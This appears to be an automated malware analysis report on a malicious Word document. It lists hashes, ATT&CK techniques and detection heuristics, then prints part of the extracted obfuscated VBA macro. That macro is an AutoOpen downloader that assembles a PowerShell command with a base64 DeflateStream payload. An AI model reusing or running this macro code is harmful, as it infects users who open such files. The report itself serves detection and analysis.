Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f86bed6d96426e59…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 100.0 KB
Created: 2018-05-23 10:37:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 4b50c1d42ee597a1bfad164646211e39
SHA-1: c9024856bbca67c308154923132756c7f5fb1bbc
SHA-256: f86bed6d96426e597d251d702068eac155c2ef005e7c1b58976270574dcdc2c2
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 (Visual Basic)
  • T1204.002 (Malicious File)

The sample contains a VBA macro with an AutoOpen function, a common technique for running code as soon as the document is opened. The macro uses a Shell() call to run a PowerShell command, which it assembles by concatenating fragments cut out of many junk-padded string literals, an effort to hide the payload from static inspection. The primary function of the script appears to be downloading and executing a second-stage payload.

Heuristics (6)

  • VBA macros detected (severity: medium; 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical) [OLE_VBA_SHELL]
    Shell() call in VBA.
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 71556 bytes
SHA-256: a8d7c3c7f6d2084271d1d1a3be23c956407d6bcfe3e02c5b5ef4b1c44af896c0

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "NLmQmSGElHV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function tBhuH()

On Error Resume Next
NXnsHEQTsh = IcvRwbO + CSng(941024) + 776689 / Sin(545306 - CByte(588203) / 353589 - Round(941024)) + zqwJZzosMcb * wpVVfmk - (776689 + 545306 + 588203 - 9410240)
Set kMLaZhjclI = qWqEvOONt
zhfdL = "bYD7owershell (NEomCgGbg6wlNWhRHPkXndblew-oBJecT iOeIkyKxX1ojfx3Un4DxjTd"
iDsfJwBN = Left(Right(zhfdL, 68), 12) + Left(Right(zhfdL, 33), 12)

ZCYnzDYwab = "bY.stREaMw4TyVW7EomCgrEaderNWhRHPkXndbl"
DjDYONtPAS = Left(Right(ZCYnzDYwab, 37), 7) + Left(Right(ZCYnzDYwab, 18), 6)

qoKjNf = "bY( (New-w4TyVW7EomCgoBJecTNWhRHPkXndbl"
kMUmLX = Left(Right(qoKjNf, 37), 7) + Left(Right(qoKjNf, 18), 6)

wnTbk = "bYD7k iO.comprEsSiOngGbg6wlNWhRHPkXndbljHOAB3l7GVH.DeflATESTreaM( 4DxjTd23vH6PcKoVrFxmyemCp6a"
IEmjLfFhVH = CStr(Left(Right(wnTbk, 88), 15)) + Left(Right(wnTbk, 43), 16)
FTlGsICWV = ShrlKajX + CSng(712213) + 2908 / Sin(699909 - CByte(642161) / 125683 - Round(712213)) + bnfWadQwV * snOKmBmocsr - (2908 + 699909 + 642161 - 7122130)
Set KkSdjBWGN = UHuwazKcc
Vncphf = "bYD7[SyStEM.iO.7EomCgGbg6wlNWhRHPkXndmEmorystREamHkeIkyKxX1ojfx3Un4Dx"
cGowmDfU = Left(Right(Vncphf, 65), 11) + Left(Right(Vncphf, 32), 12)

OUIJDoGNaO = "bYD7k] [cONVeRT]::FroGbg6wlNWhRHPkXndbljHOAB3l7GVHkeImBAsE64stRINg('XVTd23vH6PcKoVrFxmyemCp6axzcR6g"
oTLbjL = CStr(Left(Right(OUIJDoGNaO, 94), 16)) + Left(Right(OUIJDoGNaO, 46), 17)

PmwRwbBqm = "bYD7kbbbiJHEH2PlH8Y7YGbg6wlNWhRHPkXndbljHOAB3l7GVHkeINhltvcmVkrkgl4ZSeTd23vH6PcKoVrFxmyemCp6axzcR6g"
BItVtGJu = CStr(Left(Right(PmwRwbBqm, 94), 16)) + Left(Right(PmwRwbBqm, 46), 17)

CZpDLwlZjCC = "bYDG3XARdiw/yVW7EomCgGbg6wlNWhjIdxYLkaWFHOAB3l7GVHkeIkyKx"
KZiNmt = Left(Right(CZpDLwlZjCC, 54), 9) + CStr(Left(Right(CZpDLwlZjCC, 27), 10))
qLBhW = uobizHYvMuJ + CSng(179040) + 155196 / Sin(692027 - CByte(241113) / 553143 - Round(179040)) + DrofAzRh * GnBzqw - (155196 + 692027 + 241113 - 1790400)
Set CvPknLpXB = aUABbZz
BzHFJBBmPk = Chr(43)
FVjQqa = "Eeb"
tsFIXYOjkzW = Left(Right(FVjQqa, 3), 1)

oGQFzS = Chr(43)
zowioK = "bYD7kPec0901OHkYurq6gGbg6wlNWhRHPkXndbljHOAB3l7GVHurq76tQprDOrXH5J4DxjTd23vH6PcKoVrFxmyemCp6a"
jTEkUcaTv = CStr(Left(Right(zowioK, 88), 15)) + Left(Right(zowioK, 43), 16)
twEUiBcoIlf = FSJMHGJSMpN + CSng(313578) + 972209 / Sin(433559 - CByte(883336) / 512607 - Round(313578)) + rQuOR * pnHTCiTWhzu - (972209 + 433559 + 883336 - 3135780)
Set RGNcL = vajZfAn
OEUbR = Chr(43)
izzjX = "9fD7kUp4lw4T"
WJjXDDYts = CStr(Left(Right(izzjX, 12), 2)) + Left(Right(izzjX, 6), 2)

IpPuTtwjzP = Chr(43)
NkuPopFjM = "bYLSKn3uTw4TyVW7EomCgrafS3ZNWhRHPkXndbl"
BQmPlvkiho = Left(Right(NkuPopFjM, 37), 7) + Left(Right(NkuPopFjM, 18), 6)

McvkzMqkE = "bYD7kU9lXYv7/2q61a9h9ofg6wlNWhRHPkXndbljHOAB3l7GVHkeIkyK61mvVLLLsCx/OrjJ8evH6PcKoVrFxmyemCp6axzcR6gGhtImn"
NJOZhSSsr = CStr(Left(Right(McvkzMqkE, 99), 17)) + CStr(Left(Right(McvkzMqkE, 49), 18))

VWnuTCEDPr = "bYD7kA2jwePX3g8BMdD6OGbg6wlNWhRHPkXndbljHOAB3l7GVHkeCD6MeYYtnD53MeYQxjTd23vH6PcKoVrFxmyemCp6axzc"
KNsaE = Left(Right(VWnuTCEDPr, 91), 16) + Left(Right(VWnuTCEDPr, 44), 16)

SjwKDXrIlr = "bY4dLH18Ac4TyVW7EomCgGbgxcqCIfcHPkXndbljHOAB3"
nUHobBp = Left(Right(SjwKDXrIlr, 43), 8) + CStr(Left(Right(SjwKDXrIlr, 21), 7))
rqCuojiz = aAHMTt + CSng(151576) + 351934 / Sin(148908 - CByte(756253) / 206471 - Round(151576)) + nKAkEpzKS * zltHcZVczir - (351934 + 148908 + 756253 - 1515760)
Set TlcqwkCSOmm = ZUNWUB
AFiWZQau = Chr(43)
OJtwnpmAwWP = "bY94oDUGzw4TyVW7EomCgvC5/DDNWhRHPkXndbl"
iKLraCUv = Left(Right(OJtwnpmAwWP, 37), 7) + Left(Right(OJtwnpmAwWP, 18), 6)

uVDbJbsM = "FPD7kg2Tl"
lNrhBfKFaE = Left(Right(uVDbJbsM, 9), 2) + CStr(Left(Right(uVDbJbsM, 4), 1))

QSUoi = Chr(43)
EDBmNNcF = "bYD7kUGPv26UMHKhz/sC6mCg6wlNWhRHPkXndbljHOAB3l7GVHkeIkyKnwgjLDxugEWAJe6DocvH6PcKoVrFxmyemCp6axzcR6gGhtImn"
WpwCuaHwFGN = CStr(Left(Right(E
... (truncated)